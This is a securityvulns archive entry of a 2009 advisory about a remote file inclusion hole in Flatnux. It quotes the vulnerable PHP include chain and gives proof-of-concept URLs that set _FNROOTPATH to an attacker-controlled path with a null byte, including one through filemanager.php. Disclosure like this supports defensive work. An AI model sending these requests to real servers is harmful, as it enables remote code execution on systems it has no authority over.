flatnux Flatnux-2009-01-27 Remote File Include

2009-02-05T00:00:00
ID SECURITYVULNS:DOC:21295
Type securityvulns
Reporter Securityvulns
Modified 2009-02-05T00:00:00

Description

@ flatnux Flatnux-2009-01-27 RFI zaleїnoњci P + Alfons Luja + 2009 + grts : All friends

VULN : +++ include/theme.php ... <?php if (eregi("theme.php", $_SERVER['PHP_SELF'])) die(); // 0 <-- I dont give a fuck

         global $theme, $_FNROOTPATH,$lang;   //&lt;-- 1 
         global $forumback, $forumborder;       
         $_FN[&#39;table_background&#39;]=&amp;$forumback;
         $_FN[&#39;table_border&#39;]=&amp;$forumborder;


         if &#40;$forumback==&quot;&quot; &amp;&amp; $forumborder==&quot;&quot;&#41;{
            $forumback=&quot;ffffff&quot;;
            $forumborder=&quot;000000&quot;;
            }
            require_once &#40;$_FNROOTPATH . &quot;themes/$theme/theme.php&quot;&#41;;

         /*------- Funzioni ridefinibili da theme.php--------------*/
     //......
  +++ /flatnux.php line 116:

       //$_FNROOTPATH Still dont have value 
       include_once &quot;./include/theme.php&quot;;   //-- 2

  +++ /filemanager.php 
      include &quot;./include/flatnux.php&quot;; // -- RFI

p0c: http://localhost/~flatnux/index.php?_FNROOTPATH=[EVIL]%00
http://localhost/~flatnux/filemanager.php?mod=&op=&dir=/&opmod=newfile&filemanager_editor=tfuj_stary&_FNROOTPATH=[EVIl]%OO ... itd ...

--http://www.wrzuta.pl/audio/xLyg0zckZS/-- #EЈOF lol